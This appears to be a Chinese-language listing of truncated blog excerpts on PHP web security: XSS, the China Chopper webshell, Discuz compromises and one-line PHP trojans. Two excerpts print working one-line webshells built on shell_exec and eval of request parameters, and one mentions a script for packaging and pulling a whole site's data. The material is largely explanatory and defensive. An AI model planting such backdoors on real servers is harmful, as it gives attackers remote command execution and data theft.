基於PHP的應用面臨着各種各樣的攻擊： XSS：對PHP的Web應用而言，跨站腳本是一個易受攻擊的點。攻擊者可以利用它盜取用戶信息。你可以配置Apache，或是寫更安全的PHP代碼（驗證所有 ...

中國菜刀，一個非常好用而又強大的webshell，它可不是用來切菜的做飯的道具哦，是一款專業的網站管理軟件，大小只有300多KB，真是小巧實用啊！不過被不法分子利用到，就是一個黑站的利器了。我記得以前接觸的時候摸索了好久才會用，哈哈。。后來領悟之后才發現並不難操作，同時功能也比我想象的要強 ...

php經典一句話: <?php echo shell_exec($_GET['cmd']);?> 中國菜刀：官網：www.maicaidao.co原理：上傳一句話(<?php @e ...

背景 webshell就是以asp、php、jsp或者cgi等網頁文件形式存在的一種命令執行環境，也可以將其稱做為一種網頁后門。黑客在入侵了一個網站后，通常會將asp或php后門文件與網站服務器WEB目錄下正常的網頁文件混在一起，然后就可以使用瀏覽器來訪問asp或者php后門，得到一個命令執行 ...

最近參加了一個WEB安全培訓，感覺WEB攻擊跟防御都是挺有意思的。以下總結比較簡短，僅供觀賞哈。 一、XSS攻擊 　　【介紹】 　　xss攻擊是跨站腳本攻擊，例如在表單中提交含 ...

最近又發現discuz論壇被掛馬了，決定好好研究一下discuz的漏洞，技術債始終要還是要還的 一、問題發現 快要睡覺的時候，突然收到一封郵件，發現服務器上的文件被篡改了，立即登錄服務器，清空惡意 ...

一、漏洞起源 突然有同事反饋，無法注冊 看到這里不了解的同行估計一年懵逼，這里也是常用的漏洞攻擊，可以肯定的是 badwords.php文件被修改了 ，可以查看這個文件內容 & ...

說明 基於 python3.7 + django 2.2.3 實現的 django-webshell，支持顏色顯示，支持 tab 命令補全，項目地址：https://github.com/leffss/django-webssh 。參考項目。在參考項目的基礎上做了一些優化：新增前端頁面刷新確認 ...

一句話木馬是利用文件上傳漏洞，往網站傳入點上傳一句話木馬從而獲取和控制整個網站目錄。 一句話木馬代碼：<?php @eval($_POST['CMD']); ?> 代碼分析：@符號表示 ...

因為大馬只能下載一些單文件，無法下載文件夾里的文件，所以花費一些時間寫了一個PHP腳本，打包全站數據，在此分享！切勿做違法事情！ 使用方法： 1、將該程序上傳到網站的目錄下， ...